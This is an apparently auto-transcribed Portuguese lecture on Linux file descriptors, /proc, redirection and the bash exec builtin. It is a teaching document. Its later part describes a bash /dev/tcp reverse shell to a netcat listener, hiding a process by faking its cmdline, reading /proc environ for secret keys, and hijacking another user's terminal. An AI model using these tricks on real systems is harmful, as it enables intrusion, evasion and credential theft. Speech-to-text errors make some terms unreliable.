Vem aqui e pronto, vamos lá. Bom, como a gente sabe, né, faz parte de da filosofia do Linux, tentar tratar tudo como arquivo, né, desde informações acerca dos processos em execução até dispositivos conectados ao hardware, como por exemplo, os terminais também, eles são tratados como arquivos. E, por exemplo, você vai ter também um diretório ali para o disco rígido também. Então, o Linux ele tenta trazer essa interface para que você consiga trabalhar com a maioria das coisas como se fossem arquivos mesmo, né? Isso é uma parte da filosofia do Unix que influenciou o Linux e que ele acabou trazendo essa característica. Como eu disse, terminais eles também são tratados como arquivos e são armazenados, por exemplo, no diretório /dev e dependendo do terminal, se ele for, por exemplo, um pseudo terminal, uma pseudo TTI, ele vai ficar em /pts, ou se for uma TTI apenas, que vocês podem ir lá e pesquisar depois, ele vai ficar apenas no diretório lá, TTY no caso, né? Ele vai ficar apenas no diretório /dev e ali do lado. A gente não vai entrar nisso agora porque não é o foco da aula, só para introduzir aqui. No Linux, quando você inicia um processo, as informações desse processo, por exemplo, como variáveis de ambiente, linha de comando, etc., elas são armazenadas em um diretório chamado procfs, que na verdade é um sistema de arquivos virtual, que é montado geralmente na hora do boot, a gente já vai falar sobre ele mais tarde, que ele vai lá e armazena algumas configurações do hardware e também informações acerca dos processos em execução. E o Linux, ele, então, dessa forma, ele consegue trazer uma interface, né, para que a gente consiga gerenciar os conteúdos dos processos em execução, os dados, né, dos processos de execução, a partir desse sistema de arquivo virtual, procfs, que é montado na hora do boot, como eu falei. E quando você inicia um determinado processo no Linux, esse processo, ele abre junto consigo três arquivos por padrão que são regidos por um identificador numérico. A gente já vai falar desses três arquivos já já, mas a gente vai entender o que são esses identificadores, né? Como que esses identificadores funcionam. Bom, nesse caso, esses identificadores que são regidos quando você abre, quando um processo abre um determinado arquivo, é denominado file descriptor, né? E ele é usado como um file handler, ou seja, você vai gerenciar esse arquivo em questão a partir desse identificador numérico, certo? Então, a partir desse identificador, você vai lá e consegue trabalhar com esse arquivo. É, como, como eu falei, os files descriptors, eles basicamente estão por toda parte no Linux, desde o shell até, por exemplo, um processo em execução em segundo plano. Por quê? Vamos entender isso agora. Como que eu falei, né, agorinha, quando você inicia determinado processo, junto dele é aberto também três arquivinhos que são as standard strings. Esses arquivos são abertos por padrão e cada um desses arquivos eles possuem uma determinada função específica, né, e também um file descriptor, é claro. E esses três arquivos eles são usados majoritariamente no controle de entrada e saída de dados, né? Algum arquivo ele vai, por exemplo, receber os dados daquele processo, outro ele vai enviar as mensagens e outro os erros. Nesse caso aqui, por exemplo, o stdin, que ele tem o standard input, que possui file descriptor 0, que é o primeiro arquivo a ser aberto, ele possui file descriptor 0 e ele é responsável pela entrada de dados do processo, né? Ou seja, quando aquele processo ele deseja receber alguns dados através do shell ou através de algum outro recurso, geralmente ele vai puxar os dados ali do standard input, né, do stdin. A segunda, o segundo arquivo a ser aberto por padrão é o standard output. Esse é responsável pela saída de dados do processo, né? Por exemplo, quando você está executando, por exemplo, o SQL Map ali, a maioria daqueles dados que são mostrados na tela, eles são jogados ali no standard output, exceto, é claro, pelos erros e algumas entradas de dados que são lidas do stdin. E o stdir, que é o terceiro arquivo a ser aberto, que possui o file descriptor 2, começando do zero, né? Ele é responsável pelo diagnóstico e controle de dados de saída de erros, no caso, daquele processo. Ou seja, digamos que você executa um comando e aquele comando dá algum erro. Geralmente esse erro ele vai ser escrito aqui dentro desse arquivo que é o file descriptor 2, que no caso é o stdir, né? A standard in com o propósito de gerenciar a saída de erros dos processos. Ok, né? Mas
O que que esses arquivos eles têm a ver majoritariamente com a shell? Bom, basicamente, como eu disse, tudo que você vê no bash, ou por exemplo, algum comando ou qualquer shell que você esteja executando, está sendo escrito em uma dessas strings, né? Em um desses arquivos. Seja, por exemplo, o retorno do ls, seja o ps1, por exemplo, que se eu vim aqui no meu shell, deixa eu vir aqui, isso aqui, meu ps1, que nesse caso aqui mostra informações acerca do meu computador, como por exemplo o host e o usuário atual. Ele, nesse caso aqui, ele é escrito no std e não no stdout. Então fica aí a primeira pesquisa aí para vocês quiserem entender por que isso aqui é escrito no std e não no stdout, já que o stdout majoritariamente seria para, por exemplo, mostrar informações acerca dos processos, né? Acerca mensagens e coisas desse tipo, certo? Então vamos continuar. Além do que foi mencionado, né, os files descriptors eles também são usados a todo momento no recurso de IO Redirection, que é quando a gente pode, por exemplo, redirecionar um conteúdo que é para um determinado arquivo ou file descriptor para um outro local, como por exemplo um próprio file descriptor ou então um arquivo que esteja em nossa máquina, certo? A gente já vai ver como trabalhar isso com file descriptor nesse recurso aqui de IO Redirection. Então vamos lá, deixa eu abrir aqui de novo aqui meu shell. Deixa eu fechar isso aqui. Precisa agora. Aham. E pronto. Quando a gente executa, por exemplo, ls-la e manda um maior que aqui, teste, por exemplo, se eu der só um ls-la, vocês percebam que ele vai me dar aqui o conteúdo desse diretório aqui, certo? Esse conteúdo aqui, ele é escrito, geralmente, na maioria dos casos, ele é escrito no stdout. Então, quando eu jogo esse operadorzinho aqui, o maior que, ele vai pegar o conteúdo do stdout, do file descriptor 1, e jogar para esse arquivo teste aqui. Então, eu poderia, por exemplo, também fazer depois, a gente vai entrar nessa sintaxe também, botar um e teste, que vai ter exatamente o mesmo sentido aqui. Esse operador ele consegue redirecionar file descriptor diferente, não só o standard output. Então você pode vir aqui e adicionar o file descriptor e redirecionar aqui, certo? Então, por exemplo, se eu der um ls-la e um diretório que não existe aqui, vocês devem estar imaginando que essa mensagem aqui pode estar sendo escrita onde? No stdout. Mas não, como é um erro, ela geralmente ela vai ser escrita lá no std. Então, se eu, por exemplo, jogar só maior que e botar em teste, por exemplo, vocês vão ver que a mensagem ela vai continuar aparecendo. Isso porque, como eu falei, ela está sendo escrita em outro file descriptor, né? No caso, o 2, que é referente ao standard de erro, né? Então, se eu botar 2 aqui, maior que teste, a mensagem vai sumir porque ela foi redirecionada ali para aquele meu arquivo teste. Que depois a gente vai ver esse teste quando eu executo assim. Esse teste aqui, ele por debaixo dos panos, ele acaba também sendo um file do script, né? O Linux ele abre e através desse, ele abre esse arquivo teste e através dessa abertura, ele duplica então o file descriptor 2 aqui dentro desse arquivo aqui, certo? Certo, mas a gente consegue, por exemplo, através desse recurso de redirection, redirecionar, por exemplo, um file descriptor 2, que seria, por exemplo, o std, aí jogar um erro ali, e mandar para o file descriptor 1, que é o stdout, ou seja, a gente vai concatenar esses dois conteúdos, né? A gente pega um conteúdo que é para um lugar, concatena com outro, e ali vai ter uma junção dos dois, né? Então, posso, por exemplo, dar um ls em algum diretório aqui maluco, que não exista, né? Ele vai me dar esse erro. Então eu posso jogar aqui e essa sintaxe aqui ela vai redirecionar o 2 para o file do scriptor 1. Então isso aqui, antes que era escrito no std, vai ser escrito agora no stdout. Então eu posso jogar simplesmente o maior que, teste, que... Ah, sim. Deveria botar para cá. Que ele vai redirecionar tudo, né? Ali eu fiz a inversão da ordem, no caso. Aqui se eu der um cat teste, ele redirecionou tanto o stdout quanto o std para o teste, né? Na verdade, ele concatenou os dois e mandou aqui para o teste, certo? Além disso, outros operadores, como por exemplo o pipe,
Há também outros operadores, como por exemplo esse aqui, que é para redirecionar o stdin. A gente não vai entrar nele agora, mas por exemplo o pipe, você também está redirecionando o conteúdo que é para um determinado file descriptor para outro, certo? Então, por exemplo, no pipe, você redireciona o stdout de um arquivo e para o stdin de outro. Então, eu posso dar, por exemplo, um echo teste. Isso aqui ele está mandando, é claro, para o stdout, né? Como padrão, ele manda isso aqui, o echo, né? Ele manda tudo para o stdout. Então, eu posso, por exemplo, dar um cat e esse tracinho aqui, que ele vai ler o conteúdo que está indo para o stdin. É claro que isso aqui não faz nenhum sentido, né? Até porque o cat, ele vai jogar o conteúdo que ele lê direto no stdout, né? Mas é só como, como exemplo aqui, como fim didático. Então eu jogo o stdout desse arquivo aqui pro stdin desse arquivo, desse processo no caso, né? Desse processo, o processo do cat, certo? Deixa eu voltar aqui pro slide. E bom, como eu mencionei no início da aula, o Linux ele tenta tratar a maioria das coisas como arquivos, certo? E bom, não é diferente com os file descriptors. Basicamente, o Linux ele oferece uma interface para que a gente consiga trabalhar com esses file descriptors como se fossem arquivos dentro do sistema. E e esses arquivos eles geralmente ficam ali dentro do sistema de arquivo virtual que eu falei no começo da aula, né? Que é o procfs. E esse sistema de arquivo virtual ele é montado geralmente na hora do boot e ele armazena ali informações acerca dos processos e das informações do hardware, né? Então aqui, por exemplo, os files descriptors eles ficam nesse diretório aqui, mas a gente vai entrar nesse diretório /proc e a gente vai dar uma olhada um pouco a fundo nele, né? Então vamos lá. Então eu posso vir aqui, só dar um, vir aqui no cd/proc e aqui, nossa, ficou muito grande isso aqui. Vocês vão ver que tem diversas informações acerca do sistema, do hardware, né? Como, por exemplo, main info aqui e várias outras coisas. Mas esses números aqui, no começo aqui do diretório, eles são referentes a processos em execução no sistema, né? Então, ele aqui dentro desses diretórios aqui vai ter informações acerca dos processos em execução dentro desse sistema aqui. Então, eu posso dar um echo, pegar o PID do diretório do processo atual, que é o bash, né? Aqui ele me deu o PID 14, então eu posso ir lá cd/proc no 14, ou então posso cd/proc/14, mas que é mais inteligente. Posso dar um ls-la. E aqui dentro desse diretório, a gente vai ter diversas informações acerca desse processo, como por exemplo o exe aqui, que vai me mostrar qual que foi o binário que executou esse comando, o Current Working Director, é o CWD aqui, que ele vai mostrar em qual diretório o processo foi executado, certo? E esse aqui, o CWD, ele é interessante, porque se eu voltar aqui uma pasta e se eu der um ls 14, você vai ver que ele vai mudar a pasta, né? Isso porque o meu bash, né? Eu estou executando o ls a partir eh, de outro, de outro diretório. Então ele vai mudar, consequentemente, a partir de qual diretório eu estou dentro desse bash aqui. Mas isso não vai funcionar, por exemplo, se eu executar um processo fixo e der um ls ali dentro da pasta referente a esse processo, certo? E é interessante esse diretório aqui, porque se eu vir aqui, por exemplo, voltar aqui no bash, vários programas, vários binários, como por exemplo o PS do proc PSNG, ele obtém informações desse diretório aqui. E, por exemplo, digamos que você monte esse diretório em outro lugar, esse comando ele não vai conseguir enxergar os processos em execução e provavelmente não vai mostrar nada, certo? Então, é interessante saber que, por exemplo, proc, o PS, né, esse PS aqui, ele... Ih, não tem aqui. Deixa eu ver se eu consigo instalar aqui. Mas é o PS, tá? Eu não sei porque não tem aqui, eu acho que o WSL tá ruim aqui. Na verdade tem, deu um erro aqui na biblioteca. Mas é isso, se vocês executarem, por exemplo, um PS, a maioria das informações que ele vai obter vai ser, na verdade, desse diretório aqui.
E tem vários. Deixa eu ver se agora vai. Não. Tá, mas não vai dar pra mostrar aqui agora. Mas, por exemplo, vamos entrar aqui em algum desses arquivos aqui. Vocês podem ficar à vontade aí para depois pesquisar o que cada um desses arquivos representa, né? Tem várias informações legais aqui, mas um bastante interessante é cmdline aqui. Se eu der um cat, esse é um dos processos, dos arquivos, na verdade, que podem ser modificados a partir da programação. Então você pode ir lá no seu script em C ou Ruby, por exemplo, você vai modifica esse parâmetro aqui. Isso aqui pode ficar como desafio para vocês. E vocês derem um ps-a, por exemplo, ele vai obter as informações desse diretório aqui. E o que tiver dentro desse arquivo cmdline, ele vai mostrar aqui, né? Nesse caso aqui está em bash, mas como eu estou sem um ps, eu não vou conseguir mostrar. Mas eu posso, por exemplo, modificar isso aqui e vai aparecer lá no PS eu quando eu executar, né, o comando. Então é interessante porque você pode, por exemplo, criar meio que uma furtividade, né, criar um outro nome para o processo que está executando. E ali, se o cara, por exemplo, executar de forma é, sem prestar muita atenção, ele vai acabar passando despercebido. Você pode, por exemplo, escrever um código que ele copie o processo, o nome de um processo que esteja em execução como root, por exemplo. Dá para fazer isso, não precisa de permissão nenhuma. E definir o nome desse processo, o nome do seu processo, né? Com o nome daquele processo que está em root, né? Então, se o cara, por exemplo, for lá e der uma mancada, ele vai acabar passando despercebido e nem vai ver esse processo aí. Então, outro diretório, na verdade, outro arquivo que é interessante é o environ. Deixa eu dar um cat environ aqui. Que ele armazena justamente informações acerca das variáveis de ambientes daquele processo, né? Então, por exemplo, se você tiver permissão, é interessante você sempre ler esse arquivo referente a algum determinado processo em execução, né? Isso porque tem muita gente que, por exemplo, executa, digamos que um servidor, algum teste aí e passa como variável de ambiente aqui nesse caso alguma key secret, né, alguma key secreta. Então é interessante você ver que vai que alguém se por algum acaso deixou nas variáveis de ambiente lá, e é interessante sempre você dar uma olhada antes de ir para outro passo, né? É porque tem gente que acaba fazendo isso. Ok, mas isso aí são extras, né? O que interessa aqui pra gente, no caso, é esse diretório aqui, o fd, que é onde são armazenados os files do script. Eu posso dar um ls-l aqui. Vocês podem ver que eu tenho aqui justamente, nesse caso aqui, é o diretório do meu bash, né? Se eu der um echo pwd, eu tô aqui no diretório do meu bash, ou seja, eu tenho três files de descriptor aberto, e perceba que os files de descriptor aqui, o Linux, ele trata ele como se fosse links simbólicos, né? Então, nada mais são do que links que apontam para outros arquivos dentro do sistema. Nesse caso aqui do Linux, é claro, né? Então, aqui, por exemplo, você pode ter o 0, que para quem lembra é o std standard input, o 1, que é o standard de erro, e o 2, que é o standard de... Não, na verdade o 2 é o standard de erro e 1 é o standard de output. Esse 255 eu não vou entrar no mérito, até porque ele é usado ali pelo bash internamente, eu também não entendo muito sobre ele. Mas basicamente, quando um arquivo abre um determinado processo, vou mostrar isso agora, ele vai ficar aqui, o file descriptor ele vai ficar aqui dentro desse diretório aqui. Então, por exemplo, eu posso dar um cat /dev /handle. Meu amigo, Pode estourar, caralho. você tá bem aí, mano? Tá, retomando aqui. Eu posso dar um cat /dev /handle e jogar pro dev null. Eu tenho que jogar pro dev null, não posso fechar o file descriptor aqui nesse caso, porque senão vai dar um errinho, mas já mostro pra vocês. Pera aí. Nossa, claro, joguei o 2. Tá, eu vou rodar isso aqui em segundo plano. Se eu der um ls agora, vocês podem ver. Pera aí. Ah, tá. Eu tenho que ir lá no PID do cat, né, que é o 115/fd. Podem ver que aqui o cat ele tá agora com o file descriptor 3, que ele é referente àquele arquivo
que é o barra dev barra handle, né? Então, a cada novo arquivo que você for abrindo, você vai ter aqui um novo link simbólico referente àquele arquivo, certo? Deixa eu voltar aqui. Ok, beleza. Uma build-in e é bastante interessante a gente ver aqui nessa aula, que é o exec, que na verdade é baseado em uma syscall, que é a syscall exec mesmo. É, é bastante importante, pois ela faz parte do processo de inicialização natural do sistema, né? Até porque todo o processo, ele basicamente ele é iniciado a partir de um fork, que depois é substituído através dessa syscall exec. Então, mas como a aula não é sobre isso, vamos falar sobre o que importa. Basicamente essa build-in, ela permite, build-in do Bash, tá? Eu não sei se tem outras shells. Ela permite com que a gente gerencie os files descriptors referentes aos processos atual, né? Nesse caso aqui é o próprio Bash. Então a gente pode ir lá e criar um file descriptor, fechar e redirecionar um file descriptor a partir dessa build-in aqui e de uma sintaxe especial, que ela é majoritariamente criada para, por exemplo, substituir o processo atual, que no caso é ali na inicialização de um processo, né? Ela faz parte dessa ordem de instrução aí, né? Então eu vou voltar aqui pro meu shell para a gente vai ver como que a gente pode ir lá e criar um determinado file descriptor. Eu vou vir aqui. Ok, então se eu der um check exec traço help, ele vai me dar aqui o help. E pronto, deixa eu vir aqui. E para a gente criar um determinado file descriptor, a sintaxe é bastante simples, tá? É muito semelhante a quando você está trabalhando com o IO redirection. Então, por exemplo, dar um exec. E aqui ficaria o file descriptor. Por exemplo, o fd. Botar 33, não, acho que não vai 3301. Botar 7. E aqui eu vou redirecionar tudo que for para o set para esse arquivo aqui, que no caso seria, por exemplo, teste. Pronto, se eu der um ls barra proc no bash aqui, vocês vão ver que o file descriptor set ele foi aberto, ele está aqui nesse diretório aqui, que é referente ao processo do bash, né? E perceba que ele é justamente o link simbólico para esse arquivo que eu acabei de criar, o teste. Então, agora, né, eu posso, a partir desse file descriptor, gerenciar o conteúdo desse arquivo aqui. Então, posso dar um echo olá e jogar ali para o file descriptor set. Aqui, no caso, ele redirecionou o que seria para o file descriptor 1, o stdout, e mandou ali para o set. Se eu der um cat no teste, perceba que ele vai jogar ali, né, certo? Então, posso, através desse meio aqui, ir atribuindo coisa dentro desse meu file descriptor aqui. Que, no caso, é o link ali para aquele meu arquivo, né, o teste. Então, eu posso agora, através desse file descriptor, ir gerenciando e controlando o conteúdo desse file descriptor aqui. E como eu falei, eu também consigo fechar file descriptor aberto por esse processo do bash, né? Então, por exemplo, dar um exec e o file descriptor que eu quero fechar, o set mesmo, fecha aqui. A sintaxe é exatamente a mesma do IO redirection. Então, dar o set aqui, se eu der um ls, proc no PID aqui, você percebeu que aquele file descriptor ele já não vai estar aberto aqui, né? Então eu não consigo mais usar aquela coisa lá. Eu vou deixar outra pesquisa aí para vocês, se vocês quiserem entender depois. Que é, como eu falei no início da aula, né? Esse meu PS1 aqui, grande parte dos dados do Bash, eles são escritos majoritariamente no std. Como por exemplo, isso aqui que eu estou digitando, isso aqui que eu digitei, e essa PS1 aqui, se você for olhar nos trace, por exemplo, isso aqui ele está sendo escrito no std. Então, se eu fechar o std, a minha shell ela para de ser interativa. Ou seja, eu não consigo mais ver o que eu estou digitando, nem a PS1. Na verdade, eu só consigo ver o stdout, né, a saída dos comandos. Então, fica aí como pesquisa para vocês, se quiserem entender depois. Só abrir aqui de novo. Para isso. Vamos lá. Deixa eu voltar aqui para o meu slide que a gente vai entrar agora na parte de conexão TCP. Bom, é um recurso bastante interessante do Shell que é possível através dessa built-in exec, né? Que é importante ressaltar que é um recurso do Bash, tá? Não vão tentar fazer isso, não vão tentar acessar esse diretório aqui que ele não existe.
é a conexão TCP, né? Você consegue através desse recursinho aqui e essa sintaxe especial, você consegue manter uma conexão TCP através dessa sintaxe aqui, que é, por exemplo, aqui o exec7 redireciona aqui o stdout e o stdin, e aqui o endereço do site, por exemplo. Então eu posso vir aqui e dar um... Vou abrir aqui uma conexão com o Google lá, aqui na porta 80. Isso aqui não vai ficar nada, tá? E se eu der um ls, quero ver quem vai ter um palpite sobre o que vai ser esse E7 aqui, né? Será que é um arquivo? Será que é um diretório? Se eu der um ls aqui, percebam que o file descriptor set, ele é o file descriptor do tipo socket, né? Então, basicamente os sockets, de certa forma, eles também podem ser gerenciados como arquivos, tá? É claro que isso aqui está meio longe de ser um arquivo, até porque geralmente ele fica armazenado na memória RAM, mas você consegue, é claro, trabalhar com eles através de file descriptors e, consequentemente, como se fosse um arquivo. Então, agora que eu tenho esse file descriptor set aqui, eu posso, por exemplo, mandar uma requisição ali, um get, por exemplo, no file descriptor set. Na verdade, eu botei o 5, né? File descriptor set. Isso é porque nada aconteceu. Isso porque eu não li, né? Eu não li no que tá ali. Então, se eu der um cat redirecionar o stdin e puxar ali do file descriptor set, vocês vão ver que ele vai me dar a requisição que eu fiz ali no barra, né? Então aqui eu consigo, através desse recurso, manter determinada conexão com um determinado endereço. Então eu vou fechar isso aqui. Fica aí como desafio aí para vocês tentarem, por exemplo, fazer um brute force. E sim, dá para fazer, até porque eu já fiz. Fazer um brute force, fazer um port scanner com esse recurso aí, tá? É bem interessante. Talvez possa ser um pouco inútil, de certa forma, até porque tem Python aí, tem bastante coisa, mas que ajuda bastante na vida, né? Mas é legal brincar com isso aqui. Então eu vou fechar isso aqui, o set. E prontinho. Para completar aqui esse módulo aqui do exec, né? Essa parte do exec, eu vou então ensinar vocês como que a gente poderia usar essa parte de conexão TCP para a gente manter uma shell reversa, digamos, né? Com determinado endereço usando apenas o bash. Então eu vou abrir um listener aqui com um netcat. Aqui o bash. Prontinho. Aqui eu estou então no localhost na porta 301. Então preciso abrir a conexão com esse endereço, né? Então vou botar aqui, por exemplo, 7 de novo. /dev tcp 127.0.1/3301. E pronto, perceba que o Netcat ele já recebeu minha conexão, né? Mas é claro, eu não consigo fazer nada daqui, até porque eu só abri a conexão e não tem nada para eu fazer aqui. Então o que que eu vou fazer? Eu vou dar um cat, vou redirecionar o stdin lá do set e vou rodar em segundo plano, deixar ele aqui rodando em segundo plano, ou seja, tudo que for jogado desse meu netcat para esse file descriptor aqui, para essa conexão aqui, esse cat ele vai ler e vai me mostrar aqui na tela, certo? Ele vai jogar ele no stdout. Prontinho. E agora eu vou pegar o cat e abrir ele aqui como HereDoc, né? Quando eu uso só o cat aqui, ele fica esperando uma entrada até que eu lance um end of file, né? Que é o Ctrl D. Então isso aqui é como se eu fosse um arquivo só, certo? Então eu posso dar um clear aqui, vou dar um cat, pegar ali então, jogar lá para o file descriptor set. E tudo que eu digitar agora aqui deve ser enviado para cá. E o cat, aquele cat que eu joguei em segundo plano, ele vai ler o que for retornado para a conexão e vai mostrar aqui na tela. Então, se eu der um id, ele vai dar o retorno aqui, né? Eu posso dar um oame e tal, dar um ls, posso dar um cd/root. Mentira, não posso não, que eu não tenho permissão. Mas eu posso vir aqui no barra e navegar aqui, né? Eu tô com uma shell aqui dentro desse sistema, né? O próprio sistema, é claro. Então, dessa forma você consegue ir lá e fazer uso desse recurso, né, para, por exemplo, criar uma shell reversa quando, digamos que não tem um Python da vida ou um Perl
ou coisa desse tipo aí, você pode usar o bash simplesmente através desse recurso aqui. Ok, e para finalizar, eu vou mostrar uma trick bem simples aqui, que talvez vocês gostem, né? Que é basicamente no mesmo esquema do Netcat, ali, da Shell Reverse. Mas eu tô aqui, por exemplo, se eu der um TTI, ele vai me dar o arquivo referente a esse terminal aqui, que é o PTS/0. Depois vocês podem pesquisar e ver que os terminais eles também são gerenciados como se fossem arquivos. Eu posso, por exemplo, jogar alguma coisa para esse arquivo aqui, o barra dev pts/0, que, que esse terminal aqui ele vai receber. Quer ver? Eu posso dar um echo capivara barra dev pts/0. Então ele vai receber aqui. Mas tem uma coisa que eu também vou deixar aí para vocês pesquisarem. Aqui, ó. Eu quero que vocês tentem entender aonde isso aqui está sendo escrito, certo? Porque eu posso fechar o stdout e o stdir, ou seja, não tem nenhuma entrada aqui, certo? Não tem aonde eu escrever. Inclusive eu vou fechar até o 255, que é geralmente usado ali pelo bash, mas não vai fazer muita diferença agora. Se eu fechar aqui, a única entrada que vai estar recebendo aqui é o próprio stdin, ou seja, nenhuma. Se eu der um ls aqui, não vai acontecer nada, né? Ele só tá aberto aqui, essa mesh shell, só não fechou porque o stdin tá ligado. Então eu posso dar um echo aqui nesse terminal pera aí, calma aí que eu acho que eu executei errado. Deixa eu abrir aqui de novo. Beleza. TTI. Aí tá no TTI 1. Então eu vou fechar aqui o 2, o 1 e o 255. Beleza. Eu vou dar um echo teste. E pronto, perceba que mesmo com o stdout e o 255 aqui, que é usado internamente pelo bash, mesmo assim, a minha mensagem ela foi escrita, né? Ela foi escrita aqui nesse terminal aqui. Não, ela não está sendo escrita no stdout, no stdin, né? Não tem como fazer isso. Não com esse operador aqui, no caso. Mas fica aí como pesquisa para vocês. E vamos lá para trick. Esse aqui não era trick não, essa aqui é só bobeira mesmo. Então deixa eu fechar aqui. WSL corno, que não quer fechar meu terminal. Mas beleza. Pronto. A trick que eu vou mostrar aqui é bem simples, né? Acho que talvez dê pra usar aí no COD aí, quando vocês estiverem jogando aí. Vocês que são viciados aí, jogam o dia inteiro. Então, tá, digamos que eu tenho aqui uma outra shell de um outro usuário. Usuário SoraRed aqui. O SoraRed tá nessa shell aqui. Se eu der um TTI aqui, eu posso conseguir o TTI dessa shell aqui, caso eu tivesse logado na mesma instância, mas como eu não tô, eu acho que eu... Ah, na verdade eu não tenho um PS aqui, então não vou conseguir ver. Mas eu consigo, no COT, eu consigo pegar a shell do outro cara com PS. A não ser que ele tenha usado, por exemplo, alguma trick aí. E aí você senta e chora. Mas digamos que ele não tem, e você tem acesso ao terminal desse cara, né? Você sabe aonde está alocado a shell desse cara. Então eu posso, por exemplo, fazer isso aqui, ó. Dar um exec. Abrir um file descriptor 5, por exemplo, no terminal 0, que é no caso do SoraRed ali. E pronto, aqui ele está basicamente lendo o terminal. Se eu digitar alguma coisa aqui, o terminal está funcionando normalmente aqui, né? Posso dar um ls e está funcionando tudinho, certo? Ok. Mas o que eu vou fazer agora? Eu vou pegar o cat e vou redirecionar o conteúdo desse file descriptor 5 para ele, né? Então, o cat é como se ele estivesse dando infinitos cat dentro desse terminal aqui. Aí, o que for jogado aqui dentro desse terminal, ele vai vir, na verdade, para o cat. Então, o que você jogar aqui não vai ser executado pelo bash, né? Pelo shell. Então, pronto, eu já abri aqui. E para não ficar só isso, poderia só executar isso aqui, que o terminal do cara já ia ficar meio zoado, né? Tudo que eu digito aqui embaixo, por exemplo, vai lá para cima. Na verdade, grande parte. Fica meio bugado mesmo, assim. Mas se eu fechar isso aqui, tem uma coisa mais legal. Que eu acho, né? Eu posso, por exemplo, usar aquela mesma
sintaxe ali. Só que ao invés de só usar o cat e, por exemplo, ficar com o meu terminal inutilizável, porque tudo que o cara digitar aqui embaixo vai ser jogado lá pra cima, eu posso jogar aquilo que for jogado, que seria jogado aqui em cima, de volta pro terminal do cara. Então eu posso dar um pts barra u barra 0, né? E na verdade eu vou jogar isso aqui em segundo plano, pra não perder minha shell ali, né? Que eu também não sou doido. E prontinho, agora tudo que eu digitar aqui embaixo, perceba que eu consigo digitar, mas eu não consigo apagar. E eu não consigo executar os comandos, ó. Vou dar um ls, id, nada funciona praticamente, tá tudo bugado aqui. Então você consegue, digamos, brincar aí e quebrar a shell do cara. Não quebrar, né? Você poderia dar, por exemplo, um echo ali, um cat barra handle e jogar ali na shell do cara, mas você consegue também travar assim e deixar como se fosse algum problema ali do computador do cara ou coisa desse tipo. Bom, acredito que foi isso. Espero que vocês tenham curtido aí. Se tiver alguma dúvida aí, manda aí que depois eu respondo. Valeu, valeu.